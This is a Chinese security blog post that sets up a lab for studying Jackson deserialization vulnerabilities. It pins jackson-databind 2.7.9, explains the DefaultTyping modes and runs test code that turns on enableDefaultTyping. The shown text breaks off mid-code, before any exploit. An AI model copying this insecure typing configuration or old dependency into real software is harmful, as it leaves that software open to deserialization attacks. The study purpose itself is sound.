<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="desktop" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>Jackson漏洞分析 (一) | F4miti0n&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="环境pom.xml 1234567891011121314151617&lt;dependencies&gt;      &lt;dependency&gt;        &lt;groupId&gt;com.fasterxml.jackson.core&lt;&#x2F;groupId&gt;        &lt;artifactId&gt;jackson-databind&lt;&#x2F;artifactI">
<meta property="og:type" content="article">
<meta property="og:title" content="Jackson漏洞分析 (一)">
<meta property="og:url" content="http://example.com/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/index.html">
<meta property="og:site_name" content="F4miti0n&#39;s Blog">
<meta property="og:description" content="环境pom.xml 1234567891011121314151617&lt;dependencies&gt;      &lt;dependency&gt;        &lt;groupId&gt;com.fasterxml.jackson.core&lt;&#x2F;groupId&gt;        &lt;artifactId&gt;jackson-databind&lt;&#x2F;artifactI">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/cover19.jpg">
<meta property="article:published_time" content="2024-02-19T08:13:00.000Z">
<meta property="article:modified_time" content="2024-02-21T12:32:12.085Z">
<meta property="article:author" content="F4miti0n">
<meta property="article:tag" content="Java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/cover19.jpg">
  
    <link rel="alternate" href="/atom.xml" title="F4miti0n's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>F4miti0n's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <img src="/images/avatar.png" alt="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">F4miti0n </div>
      <div class="dot"></div>
      <div class="subtitle">每天都在对抗无趣的生活 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E5%A4%8D%E7%8E%B0/" rel="tag">CTF复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E6%80%BB%E7%BB%93/" rel="tag">CTF总结</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HackTheBox/" rel="tag">HackTheBox</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%89%E5%8D%93%E6%B8%97%E9%80%8F/" rel="tag">安卓渗透</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%97%B2%E8%B0%88/" rel="tag">闲谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          January 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">6 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/08 ">
          August 2023 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          July 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/05 ">
          May 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/04 ">
          April 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          March 2023 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/03/10/RASPDemo/">
            <div class="recent-link-text">
              从零开始的RASP学习
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/">
            <div class="recent-link-text">
              Weblogic漏洞分析(一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/">
            <div class="recent-link-text">
              Jackson漏洞分析 (一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/">
            <div class="recent-link-text">
              关于2023的年度总结
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
            <div class="recent-link-text">
              Mysql任意文件读取
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-Jackson漏洞分析 (一)" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
<div class="article-gallery">
  <div class="article-gallery-photos">
    
      <a class="article-gallery-img" rel="gallery_cmljqmlrg000rm0wdgekeg15e">
        <img src="/images/cover19.jpg" itemprop="image">
      </a>
    
  </div>
</div>

   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        Jackson漏洞分析 (一)
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2024-02-19T08:13:00.000Z" itemprop="datePublished">2024-02-19</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            5.4k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h2><p>pom.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-databind<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9<span class="tag">&lt;/<span class="name">version</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-core<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9<span class="tag">&lt;/<span class="name">version</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-annotations<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9<span class="tag">&lt;/<span class="name">version</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>    </span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>测试</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.core.JsonProcessingException;  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.ObjectMapper;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JacksonTest</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        p.age = <span class="number">88</span>;  </span><br><span class="line">        p.name = <span class="string">&quot;Test&quot;</span>;  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">mapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">  </span><br><span class="line">        <span class="type">String</span> <span class="variable">json</span> <span class="operator">=</span> mapper.writeValueAsString(p);  </span><br><span class="line">        System.out.println(json);  </span><br><span class="line">  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p2</span> <span class="operator">=</span> mapper.readValue(json, Person.class);  </span><br><span class="line">        System.out.println(p2);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="DefaultTyping"><a href="#DefaultTyping" class="headerlink" title="DefaultTyping"></a>DefaultTyping</h3><p>Jackson里面的DefaultTyping是一种反序列化设置，它可以让Jackson在把Java对象和JSON字符串相互转换的时候，自动加上类型信息，这里的类型信息是用来告诉Jackson这个对象是什么类的，比如Balloon，Toy，Animal 等等。再有了类型信息之后，Jackson就可以正确地把JSON字符串还原成Java对象，或者把Java对象转换成JSON字符串。</p>
<p>DefaultTyping有四种模式，它们分别是：</p>
<table>
<thead>
<tr>
<th>DefaultTyping类型</th>
<th>描述说明</th>
</tr>
</thead>
<tbody><tr>
<td>JAVA_LANG_OBJECT</td>
<td>属性的类型为Object</td>
</tr>
<tr>
<td>OBJECT_AND_NON_CONCRETE</td>
<td>属性的类型为Object、Interface、AbstractClass</td>
</tr>
<tr>
<td>NON_CONCRETE_AND_ARRAYS</td>
<td>属性的类型为Object、Interface、AbstractClass、Array</td>
</tr>
<tr>
<td>NON_FINAL</td>
<td>所有除了声明为final之外的属性</td>
</tr>
</tbody></table>
<p>其相关代码如下，可以看到是一个定义在<code>ObjectMapper</code>里面的内部静态类<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206001138.png"></p>
<p>我们在调用它的时候经常是和<code>ObjectMapper.enableDefaultTypingAsProperty()</code>方法做联动的，以此来设置<code>Jackson</code>的类型信息行为。</p>
<h4 id="JAVA-LANG-OBJECT"><a href="#JAVA-LANG-OBJECT" class="headerlink" title="JAVA_LANG_OBJECT"></a>JAVA_LANG_OBJECT</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.core.JsonProcessingException;  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.ObjectMapper;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JacksonTest</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        <span class="type">Hacker</span> <span class="variable">hacker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hacker</span>();  </span><br><span class="line">        person.lover = hacker;  </span><br><span class="line">        person.name = <span class="string">&quot;Jack&quot;</span>;  </span><br><span class="line">        person.age = <span class="number">551</span>;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> objectMapper.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有JAVA_LANG_OBJECT的JSON结果: &quot;</span>+s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> objectMapper.readValue(s, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有JAVA_LANG_OBJECT的对象结果:&quot;</span>+p);  </span><br><span class="line">  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s1</span> <span class="operator">=</span> objectMapper2.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;\n无JAVA_LANG_OBJECT的JSON结果: &quot;</span>+s1);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p1</span> <span class="operator">=</span> objectMapper2.readValue(s1, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;无JAVA_LANG_OBJECT的对象结果:&quot;</span>+p1);  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206013335.png"></p>
<h4 id="OBJECT-AND-NON-CONCRETE"><a href="#OBJECT-AND-NON-CONCRETE" class="headerlink" title="OBJECT_AND_NON_CONCRETE"></a>OBJECT_AND_NON_CONCRETE</h4><p>先建立一个接口</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">interface</span> <span class="title class_">Sex</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setSex</span><span class="params">(<span class="type">int</span> sex)</span>;    </span><br><span class="line">    <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">getSex</span><span class="params">()</span>;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后再搞一个类实现它</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MySex</span> <span class="keyword">implements</span> <span class="title class_">Sex</span> &#123;    </span><br><span class="line">    <span class="type">int</span> sex;    </span><br><span class="line">    <span class="meta">@Override</span>    </span><br><span class="line">    <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">getSex</span><span class="params">()</span> &#123;    </span><br><span class="line">        <span class="keyword">return</span> sex;    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="meta">@Override</span>    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setSex</span><span class="params">(<span class="type">int</span> sex)</span> &#123;    </span><br><span class="line">        <span class="built_in">this</span>.sex = sex;    </span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>修改Person类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Person</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> String name;  </span><br><span class="line">    <span class="keyword">public</span> Integer age;  </span><br><span class="line">    <span class="keyword">public</span> Object lover;  </span><br><span class="line">    <span class="keyword">public</span> MySex mySex;  </span><br><span class="line">    <span class="keyword">public</span> Object <span class="title function_">getLover</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> lover;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="meta">@Override</span>  </span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">toString</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Person&#123;&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;name=&#x27;&quot;</span> + name + <span class="string">&#x27;\&#x27;&#x27;</span> +  </span><br><span class="line">                <span class="string">&quot;, age=&quot;</span> + age +  </span><br><span class="line">                <span class="string">&quot;, lover=&quot;</span> + lover +  </span><br><span class="line">                <span class="string">&quot;, mySex=&quot;</span> + mySex +  </span><br><span class="line">                <span class="string">&#x27;&#125;&#x27;</span>;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> MySex <span class="title function_">getMySex</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> mySex;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setMySex</span><span class="params">(MySex mySex)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.mySex = mySex;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setLover</span><span class="params">(Object lover)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.lover = lover;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Person</span><span class="params">()</span> &#123;  </span><br><span class="line">  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getName</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> name;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setName</span><span class="params">(String name)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.name = name;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> Integer <span class="title function_">getAge</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> age;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setAge</span><span class="params">(Integer age)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.age = age;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Person</span><span class="params">(String name, Integer age)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.name = name;  </span><br><span class="line">        <span class="built_in">this</span>.age = age;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>测试代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.core.JsonProcessingException;  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.ObjectMapper;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JacksonTest</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        <span class="type">Hacker</span> <span class="variable">hacker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hacker</span>();  </span><br><span class="line">        person.lover = hacker;  </span><br><span class="line">        person.name = <span class="string">&quot;Jack&quot;</span>;  </span><br><span class="line">        person.age = <span class="number">551</span>;  </span><br><span class="line">        person.mySex = <span class="keyword">new</span> <span class="title class_">MySex</span>();  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> objectMapper.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有OBJECT_AND_NON_CONCRETE的JSON结果: &quot;</span>+s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> objectMapper.readValue(s, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有OBJECT_AND_NON_CONCRETE的对象结果:&quot;</span>+p);  </span><br><span class="line">  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s1</span> <span class="operator">=</span> 